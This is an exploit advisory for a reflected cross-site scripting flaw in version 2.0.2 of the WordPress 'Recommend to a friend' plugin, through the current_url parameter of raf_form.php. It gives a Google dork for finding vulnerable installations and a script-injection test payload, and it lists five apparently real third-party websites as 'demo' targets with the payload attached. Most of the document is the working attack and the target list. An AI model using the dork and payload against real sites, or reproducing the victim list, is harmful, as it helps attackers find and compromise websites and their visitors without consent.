####################
# Exploit Title : Wordpress Recommend to a friend plugin Cross site scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/recommend-a-friend/
# Software Link :
http://downloads.wordpress.org/plugin/recommend-a-friend.2.0.2.zip
# Google Dork : inurl:wp-content/plugins/recommend-a-friend/inc
# Date: 2013-12-23
# Tested on: Windows 7
# discovered by : ACC3SS
------------------------------------------------
#
# Exploit : Cross site scripting
#
# Location :
localhost/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=[xss]
#
# Method : Get
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
#
http://acpbusinXessclimate.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://chessmXaniac.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://foolsfXorforests.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://thepXsychicsline.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://yesXmaine.org/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script